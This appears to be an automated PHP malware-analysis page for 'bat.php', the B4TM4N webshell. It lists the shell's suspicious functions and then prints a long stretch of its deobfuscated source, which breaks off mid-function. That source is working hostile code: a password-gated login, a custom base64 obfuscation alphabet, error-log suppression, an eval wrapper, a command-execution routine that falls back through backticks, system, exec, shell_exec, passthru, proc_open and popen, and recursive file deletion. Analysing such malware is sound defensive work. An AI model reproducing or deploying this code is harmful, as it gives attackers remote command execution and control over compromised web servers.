PHP Malware Analysis
bat.php
md5: 5d64dbfacb0a98e75c75f8c9dd47613c
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Emails
- target1@target.com (Deobfuscated, Original)
- target2@target.com (Deobfuscated, Original)
- very@handsome.com (Deobfuscated, Original)
Encoding
- base64_decode (Deobfuscated, Original)
- base64_encode (Deobfuscated, Original)
Environment
- error_reporting (Deobfuscated, Original)
- getcwd (Deobfuscated, Original)
- php_uname (Deobfuscated, Original)
- phpinfo (Deobfuscated, Original)
- set_time_limit (Deobfuscated, Original)
Execution
- eval (Deobfuscated, Original)
- exec (Deobfuscated, Original)
- passthru (Deobfuscated, Original)
- proc_open (Deobfuscated, Original)
- shell_exec (Deobfuscated, Original)
- system (Deobfuscated, Original)
Files
- copy (Deobfuscated, Original)
- file_get_contents (Deobfuscated, Original)
- file_put_contents (Deobfuscated, Original)
- move_uploaded_file (Deobfuscated, Original)
Input
- _FILES (Deobfuscated, Original)
- _POST (Deobfuscated, Original)
Title
URLs
- http://website.com/shell.php?x=self-encryptor&name=shell_encrypt.php (Deobfuscated, Original)
- http://www.target.com (Deobfuscated, Original)
- https://github.com/k4mpr3t/b4tm4n/issues/5 (Deobfuscated, Original)
- https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css (Deobfuscated, HTML, Original)
- https://raw.githubusercontent.com/k4mpr3t/b4tm4n/master/bat.php (Deobfuscated, Original)
- https://www.gnu.org/graphics/lgplv3-88x31.png (Deobfuscated, Original)
- https://www.gnu.org/licenses/gpl-3.0.txt (Deobfuscated, Original)
Deobfuscated PHP code
<?php
/*
* B4TM4N SH3LL is PHP WEBSHELL
*
* Features:
* [0] File Manager
* [1] Sec. Info
* [2] Simply Database
* [3] Interactive terminal
* [4] PHP Reverse Back Connect
* [5] Run PHP Code
* [6] Custom Toolz
* [7] Self Script Encryptor !
* [8] Error Handler
* [9] Themes
*
* Account:
* [Username] B64E('user')
* [Password] sha1(md5('pass'))
*/
$x_ = "zaIgxSRawZ==:42b378d7eb719b4ad9c908601bdf290d541c9c3a";
/*
* Self Script Encryptor v1.0
* ------- by k4mpr3t -------
*
* [Usage] http://website.com/shell.php?x=self-encryptor&name=shell_encrypt.php
*
*/
$config = array(
"title" => "B4TM4N SH3LL",
// Your Title
"subtitle" => "V3RS10N 2.7 ~ k4mpr3t",
// Your Subtitle
"themes" => "br34k",
// Your Themes (D4RK or BR34K)
"debug" => false,
);
$account = array(0 => "zaIgxSRawZ==", 1 => "42b378d7eb719b4ad9c908601bdf290d541c9c3a");
session_start();
// Session Start
function any($x, $y)
{
return array_key_exists($x, $y);
}
function urle($x)
{
return B64E(urlencode($x));
}
function urld($x)
{
return urldecode(B64D(urldecode($x)));
}
define('_', DIRECTORY_SEPARATOR);
foreach ($_SERVER as $k => $v) {
define(strtolower($k), $_SERVER[$k]);
}
function B64E($x)
{
$d = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
$c = "ZYXWVUTSRQPONMLKJIHGFEDCBAzyxwvutsrqponmlkjihgfedcba9876543210+/";
$_a = "b";
$_b = "a";
$_c = "s";
$_d = "e";
$_e = "6";
$_f = "4";
$_g = "_";
$_h = "e";
$_i = "n";
$_j = "c";
$_k = "o";
$_l = "d";
$_m = "e";
$b64 = "base64_encode";
return strtr(base64_encode($x), $d, $c);
}
function B64D($x)
{
$d = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
$c = "ZYXWVUTSRQPONMLKJIHGFEDCBAzyxwvutsrqponmlkjihgfedcba9876543210+/";
$_a = "b";
$_b = "a";
$_c = "s";
$_d = "e";
$_e = "6";
$_f = "4";
$_g = "_";
$_h = "d";
$_i = "e";
$_j = "c";
$_k = "o";
$_l = "d";
$_m = "e";
$b64 = "base64_decode";
return base64_decode(strtr($x, $d, $c));
}
function error($errno, $errstr, $errfile, $errline)
{
switch ($errno) {
case E_PARSE:
case E_STRICT:
$errmsg = '# DEBUG';
break;
case E_NOTICE:
case E_USER_NOTICE:
$errmsg = '# NOTICE';
break;
case E_USER_ERROR:
case E_RECOVERABLE_ERROR:
$errmsg = '# ERROR';
break;
case E_WARNING:
case E_CORE_WARNING:
case E_COMPILE_WARNING:
case E_USER_WARNING:
$errmsg = '# WARNING';
break;
case E_ERROR:
case E_CORE_ERROR:
case E_COMPILE_ERROR:
$errmsg = '# FATAL ERROR';
break;
default:
$errmsg = '# UNKNOWN ERROR';
break;
}
echo "<div class=\"error\">";
echo $errmsg;
echo "<br>";
echo $errstr;
echo "<br>";
echo $errfile . ' (Line: ' . $errline . ')';
echo "<br>";
echo "<br>";
echo "</div>";
}
// Login Request
if (false) {
if (any("username", $_REQUEST) && any("password", $_REQUEST) && any("signin", $_REQUEST)) {
if (B64E($_REQUEST['username']) == $account[0] && sha1(md5($_REQUEST['password'])) == $account[1]) {
session_regenerate_id();
$_SESSION['action'] = array("username" => B64E($_REQUEST['username']), "password" => sha1(md5($_REQUEST['password'])));
} else {
// THIS IS FUCKING LOCAL DAMN LOG N00B! (https://github.com/k4mpr3t/b4tm4n/issues/5)
$log = array("Username: " . $_REQUEST['username'], "Password: " . $_REQUEST['password'], "Remote IP: remote_addr", "Time: " . date('Y-m-d H:i:s'), "-------------------------\r\n");
$file = "/var/www/htmlDIRECTORY_SEPARATOR.log";
$write_log = implode($log, "\r\n");
$op = fopen($file, 'a+');
fwrite($op, $write_log);
fclose($op);
}
}
}
if (!any("action", $_SESSION)) {
?><!doctype html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="robots" content="noindex"/>
<meta name="viewport" content="width=device-width,initial-scale=1,shrink-to-fit=no">
<title>Signin</title>
<link href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" rel="stylesheet" id="bootstrap-css">
<style type='text/css'>
html,body{
height:100%;
}
body{
display:-ms-flexbox;
display:-webkit-box;
display:flex;
-ms-flex-align:center;
-ms-flex-pack:center;
-webkit-box-align:center;
align-items:center;
-webkit-box-pack:center;
justify-content:center;
padding-top:40px;
padding-bottom:40px;
background-color:#f5f5f5;
}
.form-signin{
width:100%;
max-width:330px;
padding:15px;
margin:0 auto;
}
.form-signin.checkbox{
font-weight:400;
}
.form-signin.form-control{
position:relative;
box-sizing:border-box;
height:auto;
padding:10px;
font-size:16px;
}
.form-signin.form-control:focus{
z-index:2;
}
.form-signin input[type="email"]{
margin-bottom:-1px;
border-bottom-right-radius:0;
border-bottom-left-radius:0;
}
.form-signin input[type="password"]{
margin-bottom:10px;
border-top-left-radius:0;
border-top-right-radius:0;
}
</style>
</head>
<body class="text-center">
<form class="form-signin" method='post'>
<h1 class="h3 mb-3 font-weight-normal">Please sign in</h1>
<label for="username" class="sr-only">Email address</label>
<input type="text" name="username" id="username" class="form-control" placeholder="Username" autocomplete="off" required autofocus>
<label for="password" class="sr-only">Password</label>
<input type="password" name="password" id="password" class="form-control" placeholder="Password" autocomplete="off" required>
<button class="btn btn-lg btn-primary btn-block" type="submit" name="signin" value="signin">Sign In</button>
<p class="mt-5 mb-3 text-muted">©<?php
echo date('Y');
?></p>
</form>
</body>
</html><?php
} else {
ob_start();
// Prevent Double Html $_REQUEST
if (!strpos(strval(ini_get('disable_functions')), 'set_time_limit')) {
set_time_limit(0);
}
// Debug Settings
if ($config['debug'] == true) {
set_error_handler('error');
// Error Handler
error_reporting("E___V__OG");
} else {
error_reporting(0);
ini_set('error_log', null);
ini_set('html_errors', 0);
ini_set('log_errors', 0);
ini_set('log_errors_max_len', 0);
ini_set('display_errors', 0);
ini_set('display_startup_errors', 0);
}
ini_set('max_execution_time', '600');
ini_set('memory_limit', '256M');
$agent = B64D("FT06ACQoAXYrvHYXMUIMMV5e");
// Powered by B4TM4N
$title = $config['title'];
// Title Page
$start = microtime(true);
// Time Pageload
?><!DOCTYPE html>
<html>
<head>
<title>
<?php
echo $title;
?>
</title>
<meta name='author' content='k4mpr3t'/>
<link href="data:image/png;base64,AAABAAEAEBACAAAAAACwAAAAFgAAACgAAAAQAAAAIAAAAAEAAQAAAAAAQAAAAAAAAAAAAAAAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD//wAA//8AAP//AAD//wAA//8AAP7/AAD8fwAAwAcAAMAHAACMYwAADWEAAP//AAD//wAA//8AAP//AAD//wAA" rel="icon" type="image/x-icon" />
<style type="text/css">
<?php
if (strtolower($config['themes']) == 'd4rk') {
?>
:root {
--background-color:#000;
--color:#00ff00;
--txt-color: #fff;
--txt-hover-color: #fff;
--border-color: #222;
--border-hover-color: #333;
--table-odd-color : #000;
--table-even-color : #111;
--table-hover-color : #222;
--button-color : #111;
--button-hover-color : #222;
}
<?php
}
?>
<?php
if (strtolower($config['themes']) == 'br34k') {
?>
:root {
--background-color:#fff;
--color:#000;
--txt-color: #000;
--txt-hover-color: #666;
--border-color: #111;
--border-hover-color: #222;
--table-odd-color : #eee;
--table-even-color : #ddd;
--table-hover-color : #ccc;
--button-color : #ccc;
--button-hover-color : #bbb;
}
<?php
}
?>
@keyframes blinker{70%{opacity:0}}
*,html{margin:0;padding:0;line-height:1rem}
body{background:var(--background-color);color:var(--color);font-family:monospace;font-size:13px}
::-moz-selection{background:var(--color);color:var(--background-color)}
::selection{background:var(--color);color:var(--background-color)}
img{vertical-align:bottom}
hr{border:1px solid var(--border-color);margin:3px 0px 0px}
a{color:var(--color);text-decoration:none}
a:hover{color:var(--txt-hover-color)}
a.active{color:var(--txt-color)}
a.action{font-size:12px;padding:5px;margin:0px;background:var(--button-color);color:var(--txt-color);border:1px solid #222;cursor:pointer;outline:none;display:inline-block}
a.action:hover{background:var(--button-hover-color);border:1px solid var(--border-hover-color)}
label{display:inline-block;min-width:75px;padding-right:15px}
iframe{background:var(--txt-hover-color)}
fieldset {border:1px solid var(--border-color);background:var(--background-color);color:var(--color);width:100%;padding:15px;box-sizing:border-box;min-height:154px}
textarea {border:1px solid var(--border-color);background:var(--background-color);color:var(--color);width:100%;padding:15px;min-height:300px;outline:none;box-sizing:border-box;resize:none}
input[type=submit]{background:var(--button-color);border:1px solid var(--border-color);color:var(--txt-color);line-height:25px;padding:0 10px;cursor:pointer;outline:none}
input[type=submit]:hover{background:var(--button-hover-color);border:1px solid var(--border-hover-color)}
input[type=text]{background:var(--background-color);line-height: 15px;color:var(--color);border:1px solid var(--border-color);width:200px;padding:5px;outline:none;box-sizing:border-box}
input[type=number]{background:var(--background-color);line-height: 15px;color:var(--color);border:1px solid var(--border-color);width:200px;padding:5px;outline:none;box-sizing:border-box}
input[type=file]{background:var(--background-color);line-height: 15px;color:var(--color);border:1px solid var(--border-color);width:200px;padding:2px;outline:none;box-sizing:border-box}
select{background:var(--background-color);color:var(--color);border:1px solid var(--border-color);width:200px;padding:5px;outline:none;box-sizing:border-box}
#wrapper{width:93%;margin:37px auto 40px}
#info{margin:0 0 23px 0;padding:0 13px 0 0}
#header{display:inline-block;width:100%}
.header-left{float:left;width:66%}
.header-right{float:right;width:34%}
#connect{display:inline-block;width:100%}
.connect-left{float:left;width:49%}
.connect-right{float:right;width:49%}
#database-session{display:inline-block;width:100%}
.database-query{float:left;width:49%}
.database-process{float:right;width:49%}
#php{display:inline-block}
.php-left{float:left;width:49%}
.php-right{float:right;width:49%}
.divide{width:100%;display:inline-block}
.divide-left{float:left;width:50%}
.divide-right{float:right;width:50%}
.mail input[type=text]{width:100%;display:block}
.database-breadcrumb{margin:10px 0 0;display:inline-block;font-style: italic;}
#update{text-align:center}
#php-configuration{text-align:center}
.error{animation:blinker 1s linear infinite;background:var(--color);color:var(--background-color);padding:10px;margin:10px;}
#logo{margin:0 0 23px 0;padding:23px 0 23px 0;border-top:1px solid var(--border-color);border-bottom:1px solid var(--border-color)}
.content{border:1px solid var(--border-color);padding:10px;overflow:auto;overflow-y:hidden}
#process-list{padding:25px;margin:25px auto 0px;border:1px solid var(--border-color);overflow:scroll;overflow-y:hidden}
#process-list s{text-decoration:none}
.tools-header{margin-bottom:20px;padding-bottom:25px;text-align:center;border-bottom:1px solid var(--border-color)}
.menu{overflow:hidden;border-top:1px solid var(--border-color);border-bottom:1px solid var(--border-color);margin:10px 0}
.menu > ul{list-style:none;margin:0;padding:0}
.menu > ul > li{margin:0 3px 0 0;padding:10px 7px 10px 7px;display:block;float:left}
.menu > ul > li:hover{cursor:pointer}
.menu-tools{overflow:hidden;border-top:1px solid var(--border-color);border-bottom:1px solid var(--border-color);margin:10px 0}
.menu-tools > ul{list-style:none;margin:0;padding:0}
.menu-tools > ul > li{margin:0 3px 0 0;padding:10px 7px 10px 7px;display:block;float:left}
.menu-tools > ul > li:hover{cursor:pointer}
.menu-directory{;margin-bottom:10px}
.new{margin-right:15px;}
.hash label{min-width:40px;display:inline-block;padding-right:15px}
.hash-capture label{margin:10px 0;display:inline-block}
.hash input[type=radio]{margin-right:10px;display:inline-block;vertical-align:middle}
.auto-number table{counter-reset:row_}
.auto-number table tbody tr td:first-child{counter-increment:row_;vertical-align:middle;text-align:center}
.auto-number table tbody tr td:first-child::before{content:counter(row_)}
#title{text-align:center;font-size:44px;margin:0;color:var(--txt-color);margin-bottom:15px}
#subtitle{text-align:center;font-size:22px;margin:0;color:var(--txt-color);margin-top:8px}
#tools{min-height:125px;padding:10px;border-radius:5px}
#account{min-height:100px;padding:10px;border-radius:5px}
#thanks{text-align:center;font-size:16px;font-family:courier;padding:5% 0}
#footer{margin:25px auto}
#copyrights{text-align:center}
#pageload{text-align:center}
#query{margin-top:10px}
#database-query{overflow:auto;margin:10px 0}
#hexdump{height:300px;overflow:auto;overflow-x:hidden}
#terminal{min-height:100px;padding:10px;border-radius:5px}
#terminal-input{border:none}
#curdir-terminal{min-width:10px}
#database{min-height:100px;padding:10px;border-radius:5px}
#database label{width:100px;padding:5px;margin-right:10px;display:inline-block}
#port-scan label{width:100px;padding:5px;margin-right:10px;display:inline-block}
#phpinfo table{margin:25px 0}
#phpinfo tr:nth-child(odd){background:var(--background-color)}
#phpinfo tr:nth-child(even){background:var(--border-color)}
#phpinfo td,th{padding:5px;border:1px solid var(--border-color)}
#phpinfo h1{margin:10px 0}
#phpinfo h2{margin:10px 0}
#phpinfo.e{width:200px}
#phpinfo.v{word-break:break-word}
#phpinfo img{display:none}
#phpinfo hr{border:none}
.line h2{position:relative;top:12px;width:100px;display:inline;background:var(--background-color);padding:0 10px;color:var(--txt-color)}
.line{border-bottom:2px solid var(--color);text-align:center;width:287px;margin:auto}
.table {width:100%;margin:10px 0}
.table td,th{padding:5px;border:1px solid var(--border-color);max-width:250px;min-width:25px}
.table td.kanan{word-break:break-word}
.table td.kiri{width:30%}
.table tr:nth-child(odd){background:var(--table-odd-color)}
.table tr:nth-child(even){background:var(--table-even-color)}
.table tr:hover td{background:var(--table-hover-color)}
.table tfoot td{padding:10px;text-align:center}
.database-table > td.table {word-break:normal;}
.map-switch{display:inline-block}
.form-fix{margin:-15px 0}
.frmsource{margin-top:10px}
.hexdump{width:100%;padding:5px;margin-bottom:5px}
.hexdump td{text-align:left}
.highlight{background:var(--background-color);word-break:break-word;padding:15px;margin-bottom:5px;height:300px;overflow:auto}
.hash-capture{display:inline-block;width:100%}
.hash-capture-left{float:left;width:49%}
.hash-capture-right{float:right;width:49%}
.clr{clear:both}
.on{color:var(--txt-color)}
.off{color:red}
.result{padding:10px}
.sortable thead{cursor:pointer}
.disablefunc{overflow-wrap:break-word}
.loading{vertical-align:middle;width:16px;height:16px;display:inline-block;background:url('data:image/gif;base64,R0lGODlhEAAQAPIAAAAAAP///zw8PLy8vP///5ycnHx8fGxsbCH+GkNyZWF0ZWQgd2l0aCBhamF4bG9hZC5pbmZvACH5BAAKAAAAIf8LTkVUU0NBUEUyLjADAQAAACwAAAAAEAAQAAADMwi63P4wyklrE2MIOggZnAdOmGYJRbExwroUmcG2LmDEwnHQLVsYOd2mBzkYDAdKa+dIAAAh+QQACgABACwAAAAAEAAQAAADNAi63P5OjCEgG4QMu7DmikRxQlFUYDEZIGBMRVsaqHwctXXf7WEYB4Ag1xjihkMZsiUkKhIAIfkEAAoAAgAsAAAAABAAEAAAAzYIujIjK8pByJDMlFYvBoVjHA70GU7xSUJhmKtwHPAKzLO9HMaoKwJZ7Rf8AYPDDzKpZBqfvwQAIfkEAAoAAwAsAAAAABAAEAAAAzMIumIlK8oyhpHsnFZfhYumCYUhDAQxRIdhHBGqRoKw0R8DYlJd8z0fMDgsGo/IpHI5TAAAIfkEAAoABAAsAAAAABAAEAAAAzIIunInK0rnZBTwGPNMgQwmdsNgXGJUlIWEuR5oWUIpz8pAEAMe6TwfwyYsGo/IpFKSAAAh+QQACgAFACwAAAAAEAAQAAADMwi6IMKQORfjdOe82p4wGccc4CEuQradylesojEMBgsUc2G7sDX3lQGBMLAJibufbSlKAAAh+QQACgAGACwAAAAAEAAQAAADMgi63P7wCRHZnFVdmgHu2nFwlWCI3WGc3TSWhUFGxTAUkGCbtgENBMJAEJsxgMLWzpEAACH5BAAKAAcALAAAAAAQABAAAAMyCLrc/jDKSatlQtScKdceCAjDII7HcQ4EMTCpyrCuUBjCYRgHVtqlAiB1YhiCnlsRkAAAOwAAAAAAAAAAAA==')}
</style>
<script type="text/javascript">
function dean_addEvent(t,e,r){if(t.addEventListener)t.addEventListener(e,r,!1);else{r.$$guid||(r.$$guid=dean_addEvent.guid++),t.events||(t.events={});var o=t.events[e];o||(o=t.events[e]={},t["on"+e]&&(o[0]=t["on"+e])),o[r.$$guid]=r,t["on"+e]=handleEvent}}function removeEvent(t,e,r){t.removeEventListener?t.removeEventListener(e,r,!1):t.events&&t.events[e]&&delete t.events[e][r.$$guid]}function handleEvent(t){var e=!0;t=t||fixEvent(((this.ownerDocument||this.document||this).parentWindow||window).event);var r=this.events[t.type];for(var o in r)this.$$handleEvent=r[o],!1===this.$$handleEvent(t)&&(e=!1);return e}function fixEvent(t){return t.preventDefault=fixEvent.preventDefault,t.stopPropagation=fixEvent.stopPropagation,t}var stIsIE=!1;if(sorttable={init:function(){arguments.callee.done||(arguments.callee.done=!0,_timer&&clearInterval(_timer),document.createElement&&document.getElementsByTagName&&(sorttable.DATE_RE=/^(\d\d?)[\/\.-](\d\d?)[\/\.-]((\d\d)?\d\d)$/,forEach(document.getElementsByTagName("table"),function(t){-1!=t.className.search(/\bsortable\b/)&&sorttable.makeSortable(t)})))},makeSortable:function(t){if(0==t.getElementsByTagName("thead").length&&(the=document.createElement("thead"),the.appendChild(t.rows[0]),t.insertBefore(the,t.firstChild)),null==t.tHead&&(t.tHead=t.getElementsByTagName("thead")[0]),1==t.tHead.rows.length){sortbottomrows=[];for(e=0;e<t.rows.length;e++)-1!=t.rows[e].className.search(/\bsortbottom\b/)&&(sortbottomrows[sortbottomrows.length]=t.rows[e]);if(sortbottomrows){null==t.tFoot&&(tfo=document.createElement("tfoot"),t.appendChild(tfo));for(e=0;e<sortbottomrows.length;e++)tfo.appendChild(sortbottomrows[e]);delete sortbottomrows}headrow=t.tHead.rows[0].cells;for(var e=0;e<headrow.length;e++)headrow[e].className.match(/\bsorttable_nosort\b/)||(mtch=headrow[e].className.match(/\bsorttable_([a-z0-9]+)\b/),mtch&&(override=mtch[1]),mtch&&"function"==typeof sorttable["sort_"+override]?headrow[e].sorttable_sortfunction=sorttable["sort_"+override]:headrow[e].sorttable_sortfunction=sorttable.guessType(t,e),headrow[e].sorttable_columnindex=e,headrow[e].sorttable_tbody=t.tBodies[0],dean_addEvent(headrow[e],"click",sorttable.innerSortFunction=function(t){if(-1!=this.className.search(/\bsorttable_sorted\b/))return sorttable.reverse(this.sorttable_tbody),this.className=this.className.replace("sorttable_sorted","sorttable_sorted_reverse"),this.removeChild(document.getElementById("sorttable_sortfwdind")),sortrevind=document.createElement("span"),sortrevind.id="sorttable_sortrevind",sortrevind.innerHTML=stIsIE?' <font face="webdings">5</font>':" ▴",void this.appendChild(sortrevind);if(-1!=this.className.search(/\bsorttable_sorted_reverse\b/))return sorttable.reverse(this.sorttable_tbody),this.className=this.className.replace("sorttable_sorted_reverse","sorttable_sorted"),this.removeChild(document.getElementById("sorttable_sortrevind")),sortfwdind=document.createElement("span"),sortfwdind.id="sorttable_sortfwdind",sortfwdind.innerHTML=stIsIE?' <font face="webdings">6</font>':" ▾",void this.appendChild(sortfwdind);theadrow=this.parentNode,forEach(theadrow.childNodes,function(t){1==t.nodeType&&(t.className=t.className.replace("sorttable_sorted_reverse",""),t.className=t.className.replace("sorttable_sorted",""))}),sortfwdind=document.getElementById("sorttable_sortfwdind"),sortfwdind&&sortfwdind.parentNode.removeChild(sortfwdind),sortrevind=document.getElementById("sorttable_sortrevind"),sortrevind&&sortrevind.parentNode.removeChild(sortrevind),this.className+=" sorttable_sorted",sortfwdind=document.createElement("span"),sortfwdind.id="sorttable_sortfwdind",sortfwdind.innerHTML=stIsIE?' <font face="webdings">6</font>':" ▾",this.appendChild(sortfwdind),row_array=[],col=this.sorttable_columnindex,rows=this.sorttable_tbody.rows;for(e=0;e<rows.length;e++)row_array[row_array.length]=[sorttable.getInnerText(rows[e].cells[col]),rows[e]];row_array.sort(this.sorttable_sortfunction),tb=this.sorttable_tbody;for(var e=0;e<row_array.length;e++)tb.appendChild(row_array[e][1]);delete row_array}))}},guessType:function(t,e){sortfn=sorttable.sort_alpha;for(var r=0;r<t.tBodies[0].rows.length;r++)if(text=sorttable.getInnerText(t.tBodies[0].rows[r].cells[e]),""!=text){if(text.match(/^-?[£$¤]?[\d,.]+%?$/))return sorttable.sort_numeric;if(possdate=text.match(sorttable.DATE_RE),possdate){if(first=parseInt(possdate[1]),second=parseInt(possdate[2]),first>12)return sorttable.sort_ddmm;if(second>12)return sorttable.sort_mmdd;sortfn=sorttable.sort_ddmm}}return sortfn},getInnerText:function(t){if(!t)return"";if(hasInputs="function"==typeof t.getElementsByTagName&&t.getElementsByTagName("input").length,null!=t.getAttribute("sorttable_customkey"))return t.getAttribute("sorttable_customkey");if(void 0!==t.textContent&&!hasInputs)return t.textContent.replace(/^\s+|\s+$/g,"");if(void 0!==t.innerText&&!hasInputs)return t.innerText.replace(/^\s+|\s+$/g,"");if(void 0!==t.text&&!hasInputs)return t.text.replace(/^\s+|\s+$/g,"");switch(t.nodeType){case 3:if("input"==t.nodeName.toLowerCase())return t.value.replace(/^\s+|\s+$/g,"");case 4:return t.nodeValue.replace(/^\s+|\s+$/g,"");case 1:case 11:for(var e="",r=0;r<t.childNodes.length;r++)e+=sorttable.getInnerText(t.childNodes[r]);return e.replace(/^\s+|\s+$/g,"");default:return""}},reverse:function(t){newrows=[];for(e=0;e<t.rows.length;e++)newrows[newrows.length]=t.rows[e];for(var e=newrows.length-1;e>=0;e--)t.appendChild(newrows[e]);delete newrows},sort_numeric:function(t,e){return aa=parseFloat(t[0].replace(/[^0-9.-]/g,"")),isNaN(aa)&&(aa=0),bb=parseFloat(e[0].replace(/[^0-9.-]/g,"")),isNaN(bb)&&(bb=0),aa-bb},sort_alpha:function(t,e){return t[0]==e[0]?0:t[0]<e[0]?-1:1},sort_ddmm:function(t,e){return mtch=t[0].match(sorttable.DATE_RE),y=mtch[3],m=mtch[2],d=mtch[1],1==m.length&&(m="0"+m),1==d.length&&(d="0"+d),dt1=y+m+d,mtch=e[0].match(sorttable.DATE_RE),y=mtch[3],m=mtch[2],d=mtch[1],1==m.length&&(m="0"+m),1==d.length&&(d="0"+d),dt2=y+m+d,dt1==dt2?0:dt1<dt2?-1:1},sort_mmdd:function(t,e){return mtch=t[0].match(sorttable.DATE_RE),y=mtch[3],d=mtch[2],m=mtch[1],1==m.length&&(m="0"+m),1==d.length&&(d="0"+d),dt1=y+m+d,mtch=e[0].match(sorttable.DATE_RE),y=mtch[3],d=mtch[2],m=mtch[1],1==m.length&&(m="0"+m),1==d.length&&(d="0"+d),dt2=y+m+d,dt1==dt2?0:dt1<dt2?-1:1},shaker_sort:function(t,e){for(var r=0,o=t.length-1,n=!0;n;){n=!1;for(s=r;s<o;++s)if(e(t[s],t[s+1])>0){a=t[s];t[s]=t[s+1],t[s+1]=a,n=!0}if(o--,!n)break;for(var s=o;s>r;--s)if(e(t[s],t[s-1])<0){var a=t[s];t[s]=t[s-1],t[s-1]=a,n=!0}r++}}},document.addEventListener&&document.addEventListener("DOMContentLoaded",sorttable.init,!1),/WebKit/i.test(navigator.userAgent))var _timer=setInterval(function(){/loaded|complete/.test(document.readyState)&&sorttable.init()},10);window.onload=sorttable.init,dean_addEvent.guid=1,fixEvent.preventDefault=function(){this.returnValue=!1},fixEvent.stopPropagation=function(){this.cancelBubble=!0},Array.forEach||(Array.forEach=function(t,e,r){for(var o=0;o<t.length;o++)e.call(r,t[o],o,t)}),Function.prototype.forEach=function(t,e,r){for(var o in t)void 0===this.prototype[o]&&e.call(r,t[o],o,t)},String.forEach=function(t,e,r){Array.forEach(t.split(""),function(o,n){e.call(r,o,n,t)})};var forEach=function(t,e,r){if(t){var o=Object;if(t instanceof Function)o=Function;else{if(t.forEach instanceof Function)return void t.forEach(e,r);"string"==typeof t?o=String:"number"==typeof t.length&&(o=Array)}o.forEach(t,e,r)}};
</script>
<script type="text/javascript">
var xhr;
window.onload=function(){
getFocus("terminal-input");
getFocus("find-action");
getFocus("sourcefocus");
getFocus("php-code");
};
function getFocus(id){
if(document.getElementById(id)!==null){
document.getElementById(id).focus();}
}
function getAjax(txt,id,method,url){
var xmlhttp;
var urlf="";
var data=new FormData();
var params=url.split("&");
for(i=0;i<params.length;i++){
val=params[i].split("=");
if(val[0]=='text-encode'){
data.append(val[0],val[1]);
}else{if(val[0].indexOf('?')<0)
{urlf+='&'+val[0]+'='+val[1];}}}
if(window.XMLHttpRequest){xmlhttp=new XMLHttpRequest();
}else{xmlhttp=new ActiveXObject("Microsoft.XMLHTTP");}
xmlhttp.onreadystatechange=function(){
sts=["Request Not Initialized",
"Server Connection Established",
"Request Received",
"Processing Request",
"Request Finished"];
if(xmlhttp.readyState==4&&xmlhttp.status==200){
if(txt){document.getElementById(id).innerHTML=xmlhttp.responseText;
}else{document.getElementById(id).value=xmlhttp.responseText;}
}else{
if(txt){document.getElementById(id).innerHTML=
"[Status] "+"Please Wait... <div class='loading'></div><br>"+
"[State] "+sts[xmlhttp.readyState]+"<br>"+
"[Response] "+xmlhttp.response;
}else{document.getElementById(id).value=
"[Status] "+"Please Wait...\n"+
"[State] "+sts[xmlhttp.readyState]+"\n"+
"[Response] "+xmlhttp.response;}}
};
xmlhttp.open(method,window.location.href+urlf,true);
xmlhttp.send(data);
xhr=xmlhttp;
}
function ajaxAbort(txt,id){
if(txt){document.getElementById(id).innerHTML="Canceled";
}else{document.getElementById(id).value="Canceled";}
xhr.abort();
}
function checkAll(){
for(var i=0;i<document.getElementsByName('chk[]').length;i++){
document.getElementsByName('chk[]')[i].checked=document.getElementsByName('check-all')[0].checked;}
}
function checkCount(id){
count=1;
for(var i=0;i<document.getElementsByName('chk[]').length;i++){
if(document.getElementsByName('chk[]')[i].checked){
document.getElementById(id).innerHTML=count++;
}else{document.getElementById(id).innerHTML=count-1;}}
}
function mapSwitch(id,id2){
var a=document.getElementById(id);
var b=document.getElementById(id2);
if(a.style.display=='inline-block'){
a.style.display='none';
b.style.display='inline-block';
}else{a.style.display='inline-block';
b.style.display='none';}
}
function getParameter(p) {
var searchString=window.location.search.substring(1),
i,val,params=searchString.split("&");
for(i=0;i<params.length;i++){
val=params[i].split("=");
if(val[0]==p){
return val[1];}}
return null;
}
</script>
</head>
<body>
<div id="wrapper"><?php
$cur = any("c", $_SESSION) ? urld($_SESSION['c']) : getcwd();
$dir = any("d", $_REQUEST) ? urld($_REQUEST['d']) : $cur;
$map = any("r", $_REQUEST) ? dirname(urld($_REQUEST['r'])) : $dir;
function Unix()
{
return strtolower("PHP") != "win";
}
function Evil($x, $y = false)
{
$c = $y == true ? "?>" . $x . "<?php " : $x;
$evil = @eval($c);
if (error_get_last()) {
print "\n[Error] ";
return print_r(error_get_last());
}
return $evil;
}
function Execute($x)
{
$x .= ' 2>&1';
if (!is_null($backtic = `{$x}`)) {
return $backtic;
} elseif (function_exists('system')) {
ob_start();
$system = system($x);
$buff = ob_get_contents();
ob_end_clean();
return $buff;
} elseif (function_exists('exec')) {
$buff = "";
exec($x, $results);
foreach ($results as $result) {
$buff .= $result;
}
return $buff;
} elseif (function_exists('shell_exec')) {
$buff = shell_exec($x);
return $buff;
} elseif (function_exists('pcntl_exec')) {
$buff = pcntl_exec($x);
return $buff;
} elseif (function_exists('passthru')) {
ob_start();
$passthru = passthru($x);
$buff = ob_get_contents();
ob_end_clean();
return $buff;
} elseif (function_exists('proc_open')) {
$proc = proc_open($x, array(array("pipe", "r"), array("pipe", "w"), array("pipe", "w")), $pipes);
$buff = stream_get_contents($pipes[1]);
return $buff;
} elseif (function_exists('popen')) {
$buff = "";
$pop = popen($x, "r");
while (!feof($pop)) {
$buff .= fread($pop, 1024);
}
pclose($pop);
return $buff;
}
return "R.I.P Command";
}
function Remove($x)
{
if (is_dir($x)) {
if ($h = @opendir($x)) {
while (false !== ($f = readdir($h))) {
if ($f != "." && $f != "..") {
Remove($x . _ . $f);
}
}
closedir($h);
}
return rmdir($x);
} elseif (is_file($x)) {
return unlink($x);
}
return false;
}
function ChmodRecursive($x, $y)
{
if (is_dir($x)) {
if ($h = @opendir($x)) {
while (false !== ($f = readdir($h))) {
if ($f != "." && $f != "..") {
ChmodRecursive($x . _ . $f);
}
}
